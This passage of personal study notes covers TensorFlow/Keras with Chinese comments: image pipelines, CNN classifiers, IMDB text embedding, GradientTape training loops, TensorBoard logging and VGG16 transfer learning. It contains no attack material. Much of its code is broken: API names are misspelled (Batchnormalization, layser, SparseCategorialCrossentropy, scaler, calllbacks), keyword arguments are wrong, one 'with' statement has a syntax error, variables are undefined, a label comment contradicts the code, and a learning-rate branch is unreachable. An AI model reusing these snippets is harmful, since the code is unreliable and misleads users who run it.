= random.choice(range(len(all_image_path))) display.display(display.Image(all_image_path[image_index])) print(index_to_label[all_image_label[image_index]]) # airplane # 使用tensorflow读取图片 def load_preprosess_image(img_path): # img_path = all_image_path[0] img_raw = tf.io.read_file(img_path) #tf读取图片 # img_tensor = tf.image.decode_image(img_raw, channels=3) #图片解码(即转换成的tensor数值矩阵),可以解析多种格式图片,但不能返回解析后的shape img_tensor = tf.image.decode_jpeg(img_raw, channels=3) #针对jpeg格式图像解码 # img_tensor = tf.image.rgb_to_grayscale(img_tensor) #转换成单通道,即input_shape=(256,256,1) # img_tensor = tf.image.resize_image_with_crop_or_pad(img_tensor) #图像resize后不变形 img_tensor = tf.image.resize(img_tensor, (256,256)) #图像可能发生变形,使用resize可以使得解析后的tensor具备shape print(img_tensor.shape) #[256,256,3] print(img_tensor.dtype) #tf.uint8 img_tensor = tf.cast(img_tensor, tf.float32) #转换 tf.uint8 为 tf.float32 img_tensor = img_tensor/255.0 #标准化 # img_tensor = tf.image.per_image_standardization(img_tensor) #与上述类似的标准化 img_numpy = img_tensor.numpy() #tensor转换成numpy print(img_numpy.max(), img_numpy.min()) return img_tensor # 针对解码的tensor,生成图片 plt.imshow(load_preprosess_image(all_image_path[100])) # 使用tf.data构造训练和测试集 path_ds = tf.data.Dataset.from_tensor_slices(all_image_path) image_dataset = path_ds.map(load_preprosess_image) label_dataset = tf.data.Dataset.from_tensor_slices(all_image_label) print(image_dataset.shape) print(label_dataset.shape) for label in label_dataset.take(10): print(label.numpy()) for img in image_dataset.take(2): plt.imshow(img) dataset = tf.data.Dataset.zip((image_dataset, label_dataset)) test_count = int(image_count * 0.2) train_count = image_count - test_count train_dataset = dataset.skip(test_count) test_dataset = dataset.take(test_count) BATCH_SIZE = 32 train_dataset = train_dataset.shuffle(buffer_size=train_count).batch(BATCH_SIZE) test_dataset = test_dataset.batch(BATCH_SIZE) # 构建模型 # conv1-relu-bn-pooling-drop # -conv2-relu-bn-pooling-drop-... 
# -convn-relu-bn-globalpooling-dense-relu-bn-dense-relu-bn-sigmoid) model = tf.keras.Sequential() model.add(tf.keras.layers.Conv2D(64, (3,3), input_shape=(256,256,3), activation='relu')) # Relu和BN的位置可以互换 model.add(tf.keras.layers.Batchnormalization()) #放在卷基层后 #model.add(tf.keras.layers.Activation('relu')) #也可单独添加激活函数 model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(128, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(256, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(512, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(1024, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.GlobalAveragePooling2D()) model.add(tf.keras.layers.Dense(1024, activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.Dense(256, activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.Dense(1, activation='sigmoid')) # 二分类 model.summary() model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['acc']) # 使用二元交叉熵 step_per_epoch = train_count//BATCH_SIZE validation_steps = test_count//BATCH_SIZE history = model.fit(train_dataset, epochs=10, step_per_epoch=step_per_epoch, validation_data=test_dataset, validation_steps=validation_steps) # 准确率评估 print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('acc'), label='acc') plt.plot(history.epoch, history.history.get('val_acc'), label='val_acc') plt.legend() #%% 文本向量化 from tensorflow 
import keras from tensorflow.keras import layers # 电影评论数据 data = keras.datasets.imdb (x_train, y_train), (x_test, y_test) = data.load_data(num_words=10000) #已经将文本转化成ID #d = data.get_word_index() #print(np.mean([len(x) for x in x_train])) # 238 x_train = keras.preprocessing.sequence.pad_sequences(x_train, 300) #填充0,使得长度为300 x_test = keras.preprocessing.sequence.pad_sequences(x_test, 300) #test = 'i am a student ahh' #[d[x] if x in d.keys() else 0 for x in test.split()] #{x:d[x] for x in test.split() if x in d.keys()} # 构建模型 model = keras.models.Sequential() model.add(layers.Embedding(10000, 50, input_length=300)) #向量化,input_length输入数据的长度, (None, 300, 50) model.add(layers.Flatten()) #将输入展平,不影响批量大小,(None, 15000) model.add(layers.Dense(128, activation='relu', kernel_regularizer=keras.regularizers.l2(0.01))) #添加L2正则化 model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.01), loss='binary_crossentropy', metrics=['acc']) model.fit(x_train, y_train, epochs=10, batch_size=256, validation_data=(x_test, y_test)) #%% Eager模式(命令行式编写环境/tensroflow的交互模式) print(tf.executing_eagerly()) #True # tensor可以与numpy直接运算 a = tf.constant([[1,2],[3,4]]) b = tf.add(a, 1) c = tf.multiply(a, b) num = tf.convert_to_tensor(10) for i in range(num.numpy()): i = tf.constant(i) if int(i % 2) == 0: print(i) d = np.array([[5,6],[7,8]]) print(a + d) print((a + d).numpy()) # 变量 v = tf.Variable(0.0) print(v+1) v.assign(5) #改变变量的值 v.assign_add(1) #变量值加1 v.read_value() #返回变量值 # 梯度运算 w = tf.Variable([[3.0]]) #需要是float数据类型 with tf.GradientTape() as t: loss = w*w + w grad = t.gradient(loss, w) # 求解loss对w的微分 w = tf.constant([[3.0]]) with tf.GradientTape() as t: t.watch(w) # 针对常量w进行跟踪,以便于后续使用t.gradient()求导,Variable不需要watch() loss = w*w + w grad2 = t.gradient(loss, w) w = tf.constant([[3.0]]) with tf.GradientTape(persistent=True) as t: #persistent=True用于多次计算微分 t.watch(w) y = w*w + w z = y*y grad3 = t.gradient(y, w) grad4 = t.gradient(z, w) #%% 
eager自定义训练模式 - minst示例 ''' 步骤: 1)按Batch准备数据 dataset = tf.data.Dataset.from_tensor_slices((x, y)) dataset = dataset.shuffle(10000).batch(32) 2)定义模型结构 model = tf.keras.Sequential([...]) 3)选择optimizer optimizer = tf.keras.optimizer.Adam() 4)计算loss y_ = model(x) loss = loss_func(y,y_) 5)计算grads with tf.GradientTape() as t grads = t.gradient(loss, model.trainable_variables) 6)optimizer按照grads方向更新参数 optimizer.apply_gradients(zip(grads, model.trainable_variables)) 7)按batch进行训练 重复 5)和 6) ''' # 生成数据集 (train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data() # 训练集 train_image = tf.expand_dims(train_image, -1) #-1表示扩增的最后一个维度,由于使用CNN因此需要扩增数据维度 train_image = tf.cast(train_image/255, tf.float32) #需要float类型才能做梯度运算 train_labels = tf.cast(train_labels, tf.int64) dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels)) dataset = dataset.shuffle(10000).batch(32) # 默认repeat(1);如果使用fit方法的话,需添加repeat(),无限循环 # 测试集 test_image = tf.expand_dims(test_image, -1) test_image = tf.cast(test_image/255, tf.float32) test_labels = tf.cast(test_labels, tf.int64) test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels)) test_dataset = test_dataset.batch(32) # 模型构建 model = tf.keras.Sequential([ tf.keras.layers.Conv2D(16,[3,3], activation='relu',input_shape=(28,28,1)), #任意图片大小:input_shape=(None,None,1) tf.keras.layers.Conv2D(16,[3,3], activation='relu'), tf.keras.layser.GlobalMaxPooling2D(), #GlobalAveragePooling2D() tf.keras.layers.Dense(10, activation='softmax')]) # 自定义模型优化(不使用compile) optimizer = tf.keras.optimizer.Adam(lr=0.01) #初始化优化器 #loss_func = tf.keras.losses.sparse_categorial_crossentropy(y_true, y_pred, from_logits = False) #是否从上层Dense激活,如果是则True,否则False # or loss_func = tf.keras.losses.SparseCategorialCrossentropy(from_logits=False) #返回一个方法,loss_func(y, y_) features, labels = next(iter(dataset)) #按照batch迭代返回数据 predictions = model(features) #计算预测结果 print(predictions.shape) # (32, 10) tf.argmax(predictions, axis=1) 
# same as np.argmax(): index of the class with the highest predicted probability

# Loss
def loss(model, x, y):
    """Sparse-categorical-crossentropy of model(x) against integer labels y."""
    y_ = model(x)  # do NOT argmax here: the loss needs the full probability vector
    loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False)(y, y_)  # fix: was SparseCategorialCrossentropy
    # loss = tf.keras.losses.sparse_categorical_crossentropy(y, y_, from_logits=False)  # functional alternative
    return loss

# Metrics
train_loss = tf.keras.metrics.Mean('train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy')
test_loss = tf.keras.metrics.Mean('test_loss')
test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy')

# One training step (one batch).
def train_step(model, images, labels):
    with tf.GradientTape() as t:
        predictions = model(images)
        loss_step = loss_func(labels, predictions)
        # loss_step = loss(model, images, labels)  # equivalent
    grads = t.gradient(loss_step, model.trainable_variables)   # gradients of the loss w.r.t. model variables
    optimizer.apply_gradients(zip(grads, model.trainable_variables))  # apply the update
    train_loss(loss_step)                # running mean loss over batches
    train_accuracy(labels, predictions)  # running accuracy

# One evaluation step (no grads / optimizer needed).
def test_step(model, images, labels):
    pred = model(images)
    loss_step = loss_func(labels, pred)
    test_loss(loss_step)
    test_accuracy(labels, pred)  # fix: was `predictions` (undefined in this scope)

# Training loop
def train():
    for epoch in range(10):
        for batch, (images, labels) in enumerate(dataset):
            train_step(model, images, labels)
        print('Epoch{} is finished. loss is {}, accuracy is {}.'
              .format(epoch, train_loss.result(), train_accuracy.result()))
        for batch, (images, labels) in enumerate(test_dataset):
            test_step(model, images, labels)
        print('Epoch{} is finished. test_loss is {}, test_accuracy is {}.'
              .format(epoch, test_loss.result(), test_accuracy.result()))
        # reset metric state between epochs
        train_loss.reset_states()
        train_accuracy.reset_states()
        test_loss.reset_states()
        test_accuracy.reset_states()

train()

#%% Metrics overview: tf.keras.metrics
m = tf.keras.metrics.Mean('acc')  # object that accumulates a running mean
print(m(10))
print(m(20))
print(m([30, 40]))
print(m.result().numpy())  # stateful: mean over everything seen so far -> 25
m.reset_states()           # reset the accumulated state

a = tf.keras.metrics.SparseCategoricalAccuracy('acc')
a(labels, predictions)  # takes argmax internally and compares with the labels

#%% TensorBoard visualisation (keras-compiled model)
import os
import datetime

(train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data()
train_image = tf.expand_dims(train_image, -1)   # add channel axis for the CNN
train_image = tf.cast(train_image / 255, tf.float32)
train_labels = tf.cast(train_labels, tf.int64)
dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels))
dataset = dataset.shuffle(10000).repeat().batch(32)  # .repeat() because fit() is used below

test_image = tf.expand_dims(test_image, -1)
test_image = tf.cast(test_image / 255, tf.float32)
test_labels = tf.cast(test_labels, tf.int64)
test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels))
test_dataset = test_dataset.batch(32)

model = tf.keras.Sequential([
    tf.keras.layers.Conv2D(16, [3, 3], activation='relu', input_shape=(28, 28, 1)),
    tf.keras.layers.Conv2D(16, [3, 3], activation='relu'),
    tf.keras.layers.GlobalMaxPooling2D(),  # fix: was `tf.keras.layser` (typo)
    tf.keras.layers.Dense(10, activation='softmax')])

model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.01),
              loss='sparse_categorical_crossentropy',
              metrics=['acc'])

# Log the compiled metrics for TensorBoard.
log_dir = os.path.join('logs', datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)

# Log a custom scalar (the learning rate) via a file writer + LearningRateScheduler.
file_writer = tf.summary.create_file_writer(log_dir + '/lr')
#创建文件编写器 file_writer.set_as_default() #将file_writer设置成默认文件编写器 def lr_sche(epoch): learning_rate = 0.2 if epoch > 5: learning_rate = 0.02 elif epoch > 10: learning_rate = 0.01 else: learning_rate = 0.005 tf.summary.scaler('leaning_rate', data=learning_rate, step=epoch) #收集learning_rate到默认的文件编写器(即file_writer) return learning_rate lr_callback = tf.keras.calllbacks.LearningRateScheduler(lr_sche) #创建lr的回调函数 model.fit(dataset, epochs=10, step_per_epoch=60000//128, validation_data=test_data, validation_step=10000/128, callbacks=[tensorboard_callback, lr_callback]) #%% 启动tensorboard # Jupter中启动tensorboard %load_ext tensorboard %matplotlib inline %tensorboard --logdir logs # 浏览器中启动tensorboard # 从终端输入:tensorboard --logdir logs #%% eager自定义训练中的tensorboard (train_image, train_labels), (test_image, test_labels) = tf.keras.datasets.mnist.load_data() train_image = tf.expand_dims(train_image, -1) #-1表示扩增的最后一个维度,由于使用CNN因此需要扩增数据维度 train_image = tf.cast(train_image/255, tf.float32) #需要float类型才能做梯度运算 train_labels = tf.cast(train_labels, tf.int64) dataset = tf.data.Dataset.from_tensor_slices((train_image, train_labels)) dataset = dataset.shuffle(10000).repeat().batch(32) # 默认repeat(1);如果使用fit方法的话,需添加repeat(),无限循环 test_image = tf.expand_dims(test_image, -1) test_image = tf.cast(test_image/255, tf.float32) test_labels = tf.cast(test_labels, tf.int64) test_dataset = tf.data.Dataset.from_tensor_slices((test_image, test_labels)) test_dataset = test_dataset.batch(32) model = tf.keras.Sequential([ tf.keras.layers.Conv2D(16,[3,3], activation='relu',input_shape=(28,28,1)), #任意图片大小:input_shape=(None,None,1) tf.keras.layers.Conv2D(16,[3,3], activation='relu'), tf.keras.layser.GlobalMaxPooling2D(), #GlobalAveragePooling2D() tf.keras.layers.Dense(10, activation='softmax')]) optimizer = tf.keras.optimizer.Adam(lr=0.01) #初始化优化器 loss_func = tf.keras.losses.SparseCategorialCrossentropy(from_logits=False) #返回一个方法,loss_func(y, y_) train_loss = tf.keras.metrics.Mean('train_loss') train_accuracy = 
tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy') test_loss = tf.keras.metrics.Mean('test_loss') test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy') def train_step(model, images, labels): with tf.GradientTape() as t: predictions = model(images) loss_step = loss_func(labels, predictions) grads = t.gradient(loss_step, model.trainable_variables) #计算loss相对模型变量的梯度 optimizer.apply_gradients(zip(grads, model.trainable_variables)) #使用grads更新模型变量,即优化过程 train_loss(loss_step) #计算平均loss,备注:在循环过程中会记录下每个Batch的loss train_accuracy(labels, predictions) #计算平均accuracy def test_step(model, images, labels): with tf.GradientTape() as t: pred = model(images) loss_step = loss_func(labels, pred) test_loss(loss_step) test_accuracy(labels, predictions) current_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S') train_log_dir = 'logs/gradient_tape/' + current_time + '/train' test_log_dir = 'logs/gradient_tape/' + current_time + '/test' train_writer = tf.summary.create_file_writer(train_log_dir) test_writer = tf.summary.create_file_writer(test_log_dir) def train(): for epoch in range(10): print('Epoch is {}'. 
format(epoch)) # 训练 for (batch, (images, labels)) in enumerate(dataset): train_step(model, images, labels) #every batch with train_writer.set_as_default(): tf.summary.scalar('loss', train_loss.result(), step=epoch) tf.summary.scalar('acc', train_accuracy.result(), step=epoch) print('train_end') # 预测 for (batch, (images, labels)) in enumerate(test_dataset): test_step(model, images, labels) #every batch with test_writer.set_as_default(): tf.summary.scalar('loss', test_loss.result(), step=epoch) tf.summary.scalar('acc', test_accuracy.result(), step=epoch) print('test_end') # 重制状态 train_loss.reset_states() train_accuracy.reset_states() test_loss.reset_states() test_accuracy.reset_states() #%% 猫狗数据自定义训练示例 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os # 1) reload data to tf.data # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 # image = tf.image.convert_image_dtype(image) #如果原数据不是float类型,会默认把数据做归一化;如果原数据是float类型,则不会进行归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label # 图片增强 # 针对训练数据进行增强:比如上下翻转、左右翻转、图片裁剪等 def load_preprocess_image_enhance(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (360, 360)) #转换所有图片大小相同 image = tf.image.random_crop(image, [256, 256, 3]) #讲360*360的图像随机裁剪为256*256 image = tf.image.random_flip_left_right(image) #左右翻转 image = tf.image.random_flip_up_down(image) #上下翻转 # image = tf.image.random_brigtness(image, 0.5) #随机改变亮度 # image = tf.image.random_contrast(image, 0, 1) #随机改变对比度 # image = tf.image.random_hue(image, max_delta=0.3) #随机改变颜色 # image = tf.image.random_saturation(image, lower=0.2, upper=1.0) #随机改变饱和度 image = tf.cast(image, 
tf.float32) #转换数据为float类型 image = image/255 #归一化 # image = tf.image.convert_image_dtype(image) #如果原数据不是float类型,会默认把数据做归一化;如果原数据是float类型,则不会进行归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) #train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 train_image_ds = train_image_ds.map(load_preprocess_image_enhance, num_parallel_calls=AUTOTUNE) # 取出一张图片查看 for img, label in train_image_ds.take(1): plt.imshow(img) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 2) model construction model = keras.Sequential([ tf.keras.layers.Conv2D(64,(3,3),input_shape=(256,256,3), activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), 
tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Conv2D(1024,(3,3),activation='relu'), tf.keras.layers.GlobalAveragePooling2D(), #(None,1024) tf.keras.layers.Dense(256, activation='relu'), tf.keras.layers.Dense(1, activation='sigmoid') ]) model.summary() #pred = model(imags) #(32, 1) #y_ = np.array([p[0].numpy() for p in tf.cast(pred>0.5, tf.int32)]) # pred>0.5返回boolen值 #y = np.array([l[0].numpy() for l in labels]) # 3) define loss and optimizer ls = tf.keras.losses.BinaryCrossentropy(from_logits=True) optimizer = tf.keras.optimizer.Adam(lr=0.01) # 4) train define (for one batch) train_epoch_loss_avg = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.Accuracy('train_acc') def train_step(model, images, labels): with tf.GradientTape() at t: pred = model(images) loss_step = ls(labels, pred) grads = t.gradient(loss_step, model.trainable_variables) optimizer.apply_gradients(zip(grads, model.trainable_variables)) train_epoch_loss_avg(loss_step) train_accuracy(labels, tf.cast(pred>0.5, tf.int32)) # 5) test define (for one batch) test_epoch_loss_avg = tf.keras.metrics.Mean('test_loss') test_accuracy = tf.keras.metrics.Accuracy('test_acc') def test_step(model, images, labels): pred = model(images, training=False) # or # pred = model.predict(images) loss_step = ls(labels, pred) test_epoch_loss_avg(loss_step) test_accuracy(labels, tf.cast(pred>0.5, tf.int32)) # 6) model training and validation train_loss_results = [] train_acc_results = [] test_loss_results = [] test_acc_results = [] num_epochs = 30 for epoch in range(num_epochs): # train for (batch, (imgs_, labels_)) in train_image_ds: train_step(model, images=imgs_, labels=labels_) print('.', end='') print() train_loss_results.append(train_epoch_loss_avg.result()) train_acc_results.append(train_accuracy.result()) # test for (batch, (imgs_, labels_)) in test_image_ds: test_step(model, images=imgs_, labels=labels_) print('.', end='') print() 
test_loss_results.append(test_epoch_loss_avg.result()) test_acc_results.append(test_accuracy.result()) # print print('Epoch:{}, train_loss:{:.3f}, train_accuracy:{:.3f}, test_loss:{:.3f}, test_accuracy:{:.3f}'.\ format(epoch+1, train_epoch_loss_avg.result(), train_accuracy.result(), test_epoch_loss_avg.result(), test_accuracy.result())) # reset train_epoch_loss_avg.reset_states() train_accuracy.reset_states() test_epoch_loss_avg.reset_states() test_accuracy.reset_states() # 7) model optimization # 增加网络的深度(增加卷积层、全连接层),且避免过拟合(增加训练样本、添加batch normalization、添加dropout) # 类似VGG16模型: 2个64-conv2D + 2个128-conv2D + 3个256-conv2D + 3个512-conv2D + 3个512-conv2D model = keras.Sequential([ tf.keras.layers.Conv2D(64,(3,3),input_shape=(256,256,3), activation='relu'), tf.keras.layers.Batchnormalization(), # 放在卷积层后 tf.keras.layers.Conv2D(64,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(128,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(256,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(1,1),activation='relu'), #1*1卷积,用于提取channel tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() 
tf.keras.layers.Conv2D(512,(3,3),activation='relu'), tf.keras.layers.Batchnormalization() tf.keras.layers.Conv2D(512,(1,1),activation='relu'), #1*1卷积,用于提取channel tf.keras.layers.Batchnormalization() tf.keras.layers.MaxPooling2D(), tf.keras.layers.Dropout(0.1), tf.keras.layers.GlobalAveragePooling2D(), #(None,512) tf.keras.layers.Dense(4096, activation='relu'), #全连接层1 tf.keras.layers.Dense(4096, activation='relu'), #全连接层2 tf.keras.layers.Dense(1000, activation='relu'), #全连接层3 tf.keras.layers.Dense(1, activation='sigmoid') ]) model.summary() #%% 预训练模型的使用(迁移学习)- 猫狗数据集 # keras内置预训练网络,比如VGG16、VGG19、ResNet50、Inception v3、Xception等,参考 https://keras.io/zh/applications/ # ImageNet数据集:训练集120万、验证集5万、测试集10万 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os tf.test.is_gpu_avialble() #True is used GPU keras = tf.keras layers = tf.keras.layers # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 label = tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 
'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 使用VGG预训练网络 covn_base = keras.applications.VGG16(weight='imagenet', #weight=None 不使用预训练模型网络参数 include_top=False) #include_top=False 不使用顶层全连接层的参数 #权重文件存放:/Users/tinghai/.keras/models covn_base.summary() # 在预训练模型基础上,添加顶层全连接层和输出层 model = keras.Sequential() model.add(covn_base) model.add(layers.GlobalAveragePooling2D()) #类似于Flatten() model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() # 冻结预训练模型的所有参数 covn_base.trainable = False model.summary() #可训练的参数明显减少 # 训练新添加的分类层参数 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=12, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% Fine-tune # 冻结预训练模型底层卷积层参数、共同训练顶层卷积层和新添加的顶层全连接层参数 # 步骤(1-3与上述相同): # 1)在预训练模型上添加顶层全连接层和输出层 # 2)冻结预训练模型的所有参数 # 3)训练新添加的分类层参数 # 4)解冻预训练模型的部分参数(比如靠上的几层) # 5)联合训练解冻的卷积层和新添加的自定义层 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os tf.test.is_gpu_avialble() #True is used GPU keras = tf.keras layers = tf.keras.layers # 图片处理 def load_preprocess_image(path, label): image = tf.io.read_file(path) #读取图片 image = tf.image.decode_jpeg(image, channels=3) #解码图片 image = tf.image.resize(image, (256, 256)) #转换所有图片大小相同 image = tf.cast(image, tf.float32) #转换数据为float类型 image = image/255 #归一化 label = 
tf.reshape(label,[1]) #[1,2,3] => [[1],[2],[3]] return image, label BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 # train数据进行数据增强 train_image_path = glob.glob('./train/*/*.jpg') # * is cat/ or dog/ train_image_label = [int(x.split('/')[2] == 'cats') for x in train_image_path] # 0-cat, 1-dog train_image_ds = tf.data.Dataset.from_tensor_slices((train_image_path, train_image_label)) train_image_ds = train_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) train_count = len(train_image_path) train_image_ds = train_image_ds.shuffle(train_count).batch(BATCH_SIZE) train_image_ds = train_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # test数据处理不需要增强 test_image_path = glob.glob('./test/*.jpg') test_image_label = [int(x.split('/')[2] == 'cats') for x in test_image_path] # 0-cat, 1-dog test_image_ds = tf.data.Dataset.from_tensor_slices((testimage_path, test_image_label)) test_image_ds = test_image_ds.map(load_preprocess_image, num_parallel_calls=AUTOTUNE) #num_parallel_calls并行运算CPU数目 test_count = len(test_image_path) test_image_ds = test_image_ds.batch(BATCH_SIZE) test_image_ds = test_image_ds.prefetch(AUTOTUNE) #在前台已读取数据的训练同时,预先读取后台数据 # 按batch取出数据进行查看 imgs, labels = next(iter(train_image_ds)) print(imgs) #(32, 256, 256, 3) plt.imshow(imgs[0]) #显示图片 # 1)在预训练模型基础上,添加顶层全连接层和输出层 covn_base = keras.applications.VGG16(weight='imagenet', #weight=None 不使用预训练模型网络参数 include_top=False) #include_top=False 不使用顶层全连接层的参数 #权重文件存放:/Users/tinghai/.keras/models covn_base.summary() model = keras.Sequential() model.add(covn_base) model.add(layers.GlobalAveragePooling2D()) #类似于Flatten() model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() # 2)冻结预训练模型的所有参数 covn_base.trainable = False model.summary() #可训练的参数明显减少 # 3)训练新添加的分类层参数 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) history = model.fit(train_image_ds, 
